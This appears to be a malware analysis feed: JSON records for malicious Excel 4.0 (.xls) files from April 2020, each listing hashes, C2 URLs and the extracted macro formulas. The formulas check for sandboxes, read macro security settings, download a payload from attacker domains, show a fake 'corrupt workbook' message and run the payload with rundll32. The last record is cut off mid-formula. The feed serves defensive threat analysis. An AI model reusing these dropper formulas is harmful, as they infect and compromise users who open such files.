{"version":"0.2","sample":{"sample":"","kind":"file","target":"3372e196727a2b8e5a8c03edc0d6efb34e416e7f6ad29a4695cf6acebaa735d1"},"analysis":{"reported":"2020-04-09T16:15:41Z","score":10},"files":[{"filename":"3372e196727a2b8e5a8c03edc0d6efb34e416e7f6ad29a4695cf6acebaa735d1","filesize":206336,"md5":"6926ef8ac64f1f63f867f79117cf1408","sha1":"7ea1bb410c38a21cd6722631abbcc4dcc64da27a","sha256":"3372e196727a2b8e5a8c03edc0d6efb34e416e7f6ad29a4695cf6acebaa735d1","sha512":"5d66111b361c7c7c239df0255057a9c36d1170a30dda920e11538bbe81ae6a90106fb5ee0952cc30ac5a10dd686500261cf3fa7472483faab8cab41668c0ed64","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3372e196727a2b8e5a8c03edc0d6efb34e416e7f6ad29a4695cf6acebaa735d1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Erkr1GYTC6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3389221ff6650a96aa096ac1c8a4f2068b6303c93b5b43aab9874fb3b0a8d233"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"3389221ff6650a96aa096ac1c8a4f2068b6303c93b5b43aab9874fb3b0a8d233","filesize":206336,"md5":"5ef7b05635d03a682c45f681c9f2bc61","sha1":"1222c3fafd12e47840fbf0426801500e46567d09","sha256":"3389221ff6650a96aa096ac1c8a4f2068b6303c93b5b43aab9874fb3b0a8d233","sha512":"2a1173dab86b3cf28fa2b5ad666e693715f3491757b2f53f3adf037e902ccb61767126c5ce47740f1303a2163a88861f551ca93fd998385f8f126e722f080c4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3389221ff6650a96aa096ac1c8a4f2068b6303c93b5b43aab9874fb3b0a8d233.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pxzo37tp39\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33a877c967dc5bb78402db40aa1a2a37c6523dfd44df2d3049b62b956db26e32"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33a877c967dc5bb78402db40aa1a2a37c6523dfd44df2d3049b62b956db26e32","filesize":166400,"md5":"5f819396c50d5078c49ce0c3a9c55f49","sha1":"fea6c5676faa8f262906a10fe120c46ca26d32c5","sha256":"33a877c967dc5bb78402db40aa1a2a37c6523dfd44df2d3049b62b956db26e32","sha512":"faf354ce58e4c5e25431b5abbaf5a36faf7fa88fb9c55c7304c0cae5e5885cfc6bb2595dec34028d036fc604e8cf6b5ee3a101065d155b368e0f15e728f4889e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33a877c967dc5bb78402db40aa1a2a37c6523dfd44df2d3049b62b956db26e32.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://grpxmqnrb.pw/ehrj4g9g"],"attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tWEbr7Hfa7\",TRUE)\nGOTO(IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),))\nIF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://grpxmqnrb.pw/ehrj4g9g\",\"c:\\Users\\Public\\gef3fff.html\",0,0)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33ac123201a3cf3810fd7b81dacd6ef2441617e652523e3e7e2f7728c2b1e42c"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33ac123201a3cf3810fd7b81dacd6ef2441617e652523e3e7e2f7728c2b1e42c","filesize":209920,"md5":"762b6d9bc816e839c7c5732883a7a3d3","sha1":"75e8ce57cd8424c03ae1d7d4d4dcec0b74a863f7","sha256":"33ac123201a3cf3810fd7b81dacd6ef2441617e652523e3e7e2f7728c2b1e42c","sha512":"3344eec67c7676e650b84d128b650b5f9914e8ffdcc0a3df8bd1bbcf8fd83dbd9d6c74ff68459aa01092fd7de4f0bfea39a5a98c9d4787f577841677eef142fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33ac123201a3cf3810fd7b81dacd6ef2441617e652523e3e7e2f7728c2b1e42c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vFKKQutu4J\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33b57fd5be10044583d76ef2e62193c103aa5b6ca2df6ba2fdf7f781639c85ec"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33b57fd5be10044583d76ef2e62193c103aa5b6ca2df6ba2fdf7f781639c85ec","filesize":132608,"md5":"58186feb9afe94d495758b7546c89ad1","sha1":"f4fdeec6cb21f5dc823bcff890a310fb0f120865","sha256":"33b57fd5be10044583d76ef2e62193c103aa5b6ca2df6ba2fdf7f781639c85ec","sha512":"d92a38cc62d74c69e18b4036d46fbc988dfac35feb85af9dbff857883885494d1489a72a3c112906f624c30a52e0afa61701fc4ddc9353d2add06c0c54753d22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33b57fd5be10044583d76ef2e62193c103aa5b6ca2df6ba2fdf7f781639c85ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hm0Hh81fBH\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33b6e355de12f6dbfe51b4929491e0d63a805e5868a93bb66faf74f7d6aa6ef9"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33b6e355de12f6dbfe51b4929491e0d63a805e5868a93bb66faf74f7d6aa6ef9","filesize":160768,"md5":"ebdfaa05929b70240866accd3d99bfa4","sha1":"1a9869857b03ea161d0ab649c9f72cc0f4e719ca","sha256":"33b6e355de12f6dbfe51b4929491e0d63a805e5868a93bb66faf74f7d6aa6ef9","sha512":"41547155a8c7392bc3e85f22e4bc2b5e741f38464ad8863c8893419198894143e0cc36d1066fbedfa8debb3342a44d4370f9e6317934cee5b8f10dfb7c6c6794","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33b6e355de12f6dbfe51b4929491e0d63a805e5868a93bb66faf74f7d6aa6ef9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ikh5wHC1aB\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33c66f7dc6157801f4c8f3f8e53b16c138f621df86a227b5b243c2bc2d3cb967"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33c66f7dc6157801f4c8f3f8e53b16c138f621df86a227b5b243c2bc2d3cb967","filesize":171008,"md5":"ad5c668bd06bf5546b969882357c1797","sha1":"c0a304d27facc6113f581d37107bcd5a2c83a264","sha256":"33c66f7dc6157801f4c8f3f8e53b16c138f621df86a227b5b243c2bc2d3cb967","sha512":"086280acc5b4e05e90987073683feae30dadb603531291355bd5ade041da2eecfb42ab78887cced1ea09cfc5fc5a08605bf99697975ae0030d6a86106b01f06e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33c66f7dc6157801f4c8f3f8e53b16c138f621df86a227b5b243c2bc2d3cb967.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"h6ZHDcHNIs\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33dedcd77a7b89e6ed080af8ba9eaf158e62ddc9e6585fb3b88fd4937c8b3dff"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33dedcd77a7b89e6ed080af8ba9eaf158e62ddc9e6585fb3b88fd4937c8b3dff","filesize":116224,"md5":"2ca8231fd0df400b83431cd2d8da2757","sha1":"8bc6fde28cc913aabda166e4f249c26420689fe9","sha256":"33dedcd77a7b89e6ed080af8ba9eaf158e62ddc9e6585fb3b88fd4937c8b3dff","sha512":"6a4bee8ac2c9014551cc49d88004c137ee35d5018655929029ffc24c44147ae47cd0b8f9c79493151abcba40cce2c0e74a079ddb7e4fb39d02c9eac50322df3f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33dedcd77a7b89e6ed080af8ba9eaf158e62ddc9e6585fb3b88fd4937c8b3dff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RUvfW3nvv4\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33e3493448c3dec98df312d22903186d6e144653afee1b617b77a0d7fd4f879a"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33e3493448c3dec98df312d22903186d6e144653afee1b617b77a0d7fd4f879a","filesize":209920,"md5":"6cd19eb44fd81ed0a05c570de42c83a8","sha1":"ed9aabe07a0e6a65a72debdff89c618a5ac8dbe9","sha256":"33e3493448c3dec98df312d22903186d6e144653afee1b617b77a0d7fd4f879a","sha512":"993989d2b007a47a97f83ec3dd77dbc9797f48331a9b221b107e14400ea442c85d7340d536fa705775b83facc23769340a56519834911503cefc4640cf357261","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33e3493448c3dec98df312d22903186d6e144653afee1b617b77a0d7fd4f879a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"v2TPk3sdtD\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33ead0a8e55436f36ca031940f805f3102f04454685021e93e042073508d4252"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33ead0a8e55436f36ca031940f805f3102f04454685021e93e042073508d4252","filesize":209920,"md5":"e75ec44381248653bebf40c14ffa3679","sha1":"45cb5e8b01d0c8f7d388cc6dae1b145f5806674e","sha256":"33ead0a8e55436f36ca031940f805f3102f04454685021e93e042073508d4252","sha512":"a3d0e9b7490d177bc6a0a0a3a8fcf5ea02411e0857e6761271179a0bdfc3a2d67207386152f78a4dfe9f5d529a27225635f9082789c83e6ebdff2e1bd906e471","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33ead0a8e55436f36ca031940f805f3102f04454685021e93e042073508d4252.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zYLvRKZvx8\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"33fc696c4e0ef86255fa0ffb03bcfc2469dcd873afcfe3d59458c7f00ad4245d"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"33fc696c4e0ef86255fa0ffb03bcfc2469dcd873afcfe3d59458c7f00ad4245d","filesize":206336,"md5":"6c66301d90def2157db2152112662c99","sha1":"d47b6ef58bfe625579c13e95472729677aba1fae","sha256":"33fc696c4e0ef86255fa0ffb03bcfc2469dcd873afcfe3d59458c7f00ad4245d","sha512":"e6c94a7bb8d115cfd3f14d6a4a84df0759112c010738d59cf21e8de5636379bf9a82ad650bb90e58cccc56cba02be4e4387bed1622730f415963c88d748c58a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"33fc696c4e0ef86255fa0ffb03bcfc2469dcd873afcfe3d59458c7f00ad4245d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iJz4lbvAfJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3408063045e693913c3c40437e9e336f70475f3ecc3825ff2c8c52d4386bb0ed"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"3408063045e693913c3c40437e9e336f70475f3ecc3825ff2c8c52d4386bb0ed","filesize":206336,"md5":"476123cf75ec93b53cd8598d4a52603e","sha1":"9b3e782eaa519d9ea02c5817ad12d2d39a99774b","sha256":"3408063045e693913c3c40437e9e336f70475f3ecc3825ff2c8c52d4386bb0ed","sha512":"b507bb0fc8851bab9928344a06bf65a4527c92a2e429d3953abf59fd7d035058a81af04a91b459348c30e9abca9ca1622240c94e2d88d227851850e362eb77ec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3408063045e693913c3c40437e9e336f70475f3ecc3825ff2c8c52d4386bb0ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 